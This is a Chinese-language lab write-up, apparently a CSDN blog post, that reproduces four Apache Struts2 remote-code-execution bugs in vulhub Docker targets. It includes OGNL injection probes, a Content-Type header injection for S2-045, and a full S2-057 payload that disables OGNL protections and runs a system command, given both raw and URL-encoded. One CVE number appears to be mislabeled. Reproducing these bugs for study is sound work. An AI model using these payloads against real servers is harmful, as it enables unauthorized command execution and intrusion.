Struts2漏洞复现

「爱情、让人受尽委屈。」 2023-10-07 22:03 1阅读 0赞

### Struts2简介 ###

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目，是一套用于创建企 业级Java Web 应用的开源MVC框架，主要提供两个版本框架产品: Struts 1和Struts2; Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式 中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一 代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。

#### 复现漏洞名称： ####

**Struts2 s2-016、Struts2 s2-045、Struts2 s2-057、Struts2 s2-059**

漏洞名称：S2-016（CVE-2013-2251）

影响版本：S2.0.0-2.3.15

实现功能：获取WEB路径,任意命令执行,反弹shell和文件上传

**环境搭建**

使用vulhub靶场

> cd vulhub/struts2/s2-016
> 
> docker-compose up -d

出现此界面，表示环境搭建成功

![1a089dc768134b5b83cbee99ca092dfe.png][]

**一、poc测试**

输入以下参数：your-ip:8080/index.action?redirect:%25%7B5\*5%7D

出现以下界面，说明命令被成功执行，表示存在漏洞

![18cba045711242bf97f57ae707fc8fb7.png][]

二、使用工具检测

输入目标地址，漏洞编号选择全部。点击验证漏洞

![ef1b5d1536b94618b8c3226888e14f2f.png][]

存在漏洞， 执行命令

![0b89e02877214a7998e2a2caa50ce94e.png][]

漏洞名称：S2-045（CVE-2017-6738）

影响版本：S2.3.5-2.3.31;2.5-2.5.10

实现功能：获取WEB路径,任意命令执行,反弹shell和文件上传

**环境搭建**

使用vulhub靶场

> cd vulhub/struts2/s2-045
> 
> docker-compose up -d

![39e51f9e834f49e2bece1c180e5d63a1.png][]

> 访问靶场
> 
> http://your-ip:8080/doUpload.action

![828cca0bcc574e09b12899d96503c782.png][]

上传任意文件，burpstuite拦截请求

![30cb981f51a943eebcdc5f0ed6c69f85.png][]

修改content-type参数

> %\{\#context\['com.opensymphony.xwork2.dispatcher.HttpServletResponse'\].addHeader('vulhub',120\*120)\}.multipart/form-data

![888812530e9f4b82a8d5df7e83a866b2.png][]

使用工具检测

输入目标地址，漏洞编号选s2-045。点击验证漏洞

![155e03bb36d94f8897b8777dbb1b5875.png][]

存在漏洞， 执行命令

![ee7789fec943424684f536ac983ad529.png][]

漏洞名称：S2-057（CVE-2013-2251）

影响版本：S2.3.-2.3.34；2.5-2.5.16

实现功能：任意命令执行和反弹shell

**环境搭建**

使用vulhub靶场

> cd vulhub/struts2/s2-057
> 
> docker-compose up -d

![3dd09035526f4aff9749d6d18e01e4e3.png][]

构造poc，使用抓包工具burp suite，修改数据包插入poc。  
poc:

/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/actionChain1.action

URL编码后：

/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

![156c5626b53840d389f3aca0218ef589.png][]

漏洞名称：S2-059（CVE-2019-0230）

影响版本：S2.0.0-2.5.20

实现功能：任意命令执行

**环境搭建**

使用vulhub靶场

> cd vulhub/struts2/s2-059
> 
> docker-compose up -d

> 1.访问靶场：your-ip:8080/index.action

![7f5c6c66212c45b08a831ec117b52bf5.png][]

> 2.访问http://your-ip:8080/?id=%25\{66\*66\}；  
> `可以看到66*66被成功解析了`

![66a6a92c29374effac1a4d5b9271cc5b.png][]

参考链接：

[https://blog.csdn.net/qq\_61503377/article/details/125978312][https_blog.csdn.net_qq_61503377_article_details_125978312]

如有问题，欢迎留言

[1a089dc768134b5b83cbee99ca092dfe.png]: https://img-blog.csdnimg.cn/1a089dc768134b5b83cbee99ca092dfe.png
[18cba045711242bf97f57ae707fc8fb7.png]: https://img-blog.csdnimg.cn/18cba045711242bf97f57ae707fc8fb7.png
[ef1b5d1536b94618b8c3226888e14f2f.png]: https://img-blog.csdnimg.cn/ef1b5d1536b94618b8c3226888e14f2f.png
[0b89e02877214a7998e2a2caa50ce94e.png]: https://img-blog.csdnimg.cn/0b89e02877214a7998e2a2caa50ce94e.png
[39e51f9e834f49e2bece1c180e5d63a1.png]: https://img-blog.csdnimg.cn/39e51f9e834f49e2bece1c180e5d63a1.png
[828cca0bcc574e09b12899d96503c782.png]: https://img-blog.csdnimg.cn/828cca0bcc574e09b12899d96503c782.png
[30cb981f51a943eebcdc5f0ed6c69f85.png]: https://img-blog.csdnimg.cn/30cb981f51a943eebcdc5f0ed6c69f85.png
[888812530e9f4b82a8d5df7e83a866b2.png]: https://img-blog.csdnimg.cn/888812530e9f4b82a8d5df7e83a866b2.png
[155e03bb36d94f8897b8777dbb1b5875.png]: https://img-blog.csdnimg.cn/155e03bb36d94f8897b8777dbb1b5875.png
[ee7789fec943424684f536ac983ad529.png]: https://img-blog.csdnimg.cn/ee7789fec943424684f536ac983ad529.png
[3dd09035526f4aff9749d6d18e01e4e3.png]: https://img-blog.csdnimg.cn/3dd09035526f4aff9749d6d18e01e4e3.png
[156c5626b53840d389f3aca0218ef589.png]: https://img-blog.csdnimg.cn/156c5626b53840d389f3aca0218ef589.png
[7f5c6c66212c45b08a831ec117b52bf5.png]: https://img-blog.csdnimg.cn/7f5c6c66212c45b08a831ec117b52bf5.png
[66a6a92c29374effac1a4d5b9271cc5b.png]: https://img-blog.csdnimg.cn/66a6a92c29374effac1a4d5b9271cc5b.png
[https_blog.csdn.net_qq_61503377_article_details_125978312]: https://blog.csdn.net/qq_61503377/article/details/125978312